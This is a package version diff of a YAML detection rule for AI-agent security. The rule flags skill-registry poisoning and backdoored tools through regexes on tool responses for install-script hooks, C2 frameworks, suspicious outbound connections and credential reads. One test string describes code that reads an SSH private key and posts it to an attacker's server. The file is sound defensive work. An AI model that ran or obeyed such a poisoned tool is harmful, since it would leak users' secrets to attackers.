@panguard-ai/atr 1.1.0 → 1.4.0

package/rules/tool-poisoning/ATR-2026-096-registry-poisoning.yaml

@@ -1,4 +1,4 @@
-title: 'Skill Registry Poisoning and Compromised Tool Distribution'
+title: "Skill Registry Poisoning and Compromised Tool Distribution"
 id: ATR-2026-096
 status: draft
 description: >
@@ -7,18 +7,18 @@ description: >
   inject backdoors into published skills, or create typosquatting tool
   names to distribute poisoned tools that execute malicious actions
   when installed or invoked by agents.
-author: 'ATR Community (MiroFish Predicted)'
-date: '2026/03/11'
-schema_version: '0.1'
+author: "ATR Community (MiroFish Predicted)"
+date: "2026/03/11"
+schema_version: "0.1"
 detection_tier: pattern
 maturity: test
 severity: critical
 
 references:
   mitre_atlas:
-    - 'AML.T0056'
+    - "AML.T0056"
   mitre_attack:
-    - 'T0056'
+    - "T0056"
 
 tags:
   category: tool-poisoning
@@ -37,28 +37,29 @@ detection:
     - field: tool_response
       operator: regex
       value: "(?i)(post_?install|pre_?install|setup\\.py|__init__\\.py)\\s*.{0,30}(exec|eval|os\\.|subprocess|import\\s+socket|import\\s+requests\\.post)"
-      description: 'Malicious execution hooks in install scripts from tool packages'
+      description: "Malicious execution hooks in install scripts from tool packages"
     - field: tool_response
       operator: regex
       value: "(?i)\\b(reverse.?shell|bind.?shell|meterpreter|cobalt.?strike|beacon|c2.?server|command.?and.?control)\\b"
-      description: 'Known malware/C2 framework references in tool response'
+      description: "Known malware/C2 framework references in tool response"
     - field: tool_response
       operator: regex
       value: "(?i)(\\bSocket\\s*\\(|net\\.connect|new\\s+WebSocket|XMLHttpRequest|fetch\\s*\\()\\s*.{0,30}(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|attacker|evil|malicious|c2|ngrok)"
-      description: 'Outbound network connections to suspicious destinations'
+      description: "Outbound network connections to suspicious destinations"
     - field: tool_response
       operator: regex
       value: "(?i)(process\\.env|os\\.environ|System\\.getenv|ENV\\[)\\s*.{0,10}(API.?KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|PRIVATE.?KEY)"
-      description: 'Environment variable access targeting secrets and credentials'
+      description: "Environment variable access targeting secrets and credentials"
     - field: tool_response
       operator: regex
       value: "(?i)\\b(fs\\.read|open\\s*\\(|File\\.read|readFile)\\s*.{0,30}(\\.ssh|id_rsa|\\.aws|credentials|\\.env|shadow|passwd|config\\.json|secrets?\\.)"
-      description: 'Reading sensitive system files or credential stores'
+      description: "Reading sensitive system files or credential stores"
 
   condition: any
 
+
   false_positives:
-    - 'Legitimate security audit tools that check for credential exposure'
+    - "Legitimate security audit tools that check for credential exposure"
 
 response:
   actions:
@@ -79,5 +80,14 @@ test_cases:
     - tool_response: "Tool code reads: open('/home/user/.ssh/id_rsa').read() and posts to https://c2.attacker.com"
       expected: triggered
   true_negatives:
-    - tool_response: 'Tool reads config.json for database connection string and returns query results'
+    - tool_response: "Tool reads config.json for database connection string and returns query results"
+      expected: not_triggered
+    - tool_response: "Registry lookup: package 'lodash' version 4.17.21 found. License: MIT. Downloads: 45M/week."
+      expected: not_triggered
+      description: "Normal registry package lookup result"
+    - tool_response: "Dependency tree resolved: 142 packages, 0 conflicts. All versions satisfy semver constraints."
+      expected: not_triggered
+      description: "Normal dependency resolution output"
+    - tool_response: "Tool verified: SHA-256 checksum matches published hash. Signature valid. Author: verified-publisher."
       expected: not_triggered
+      description: "Normal tool verification and integrity check output"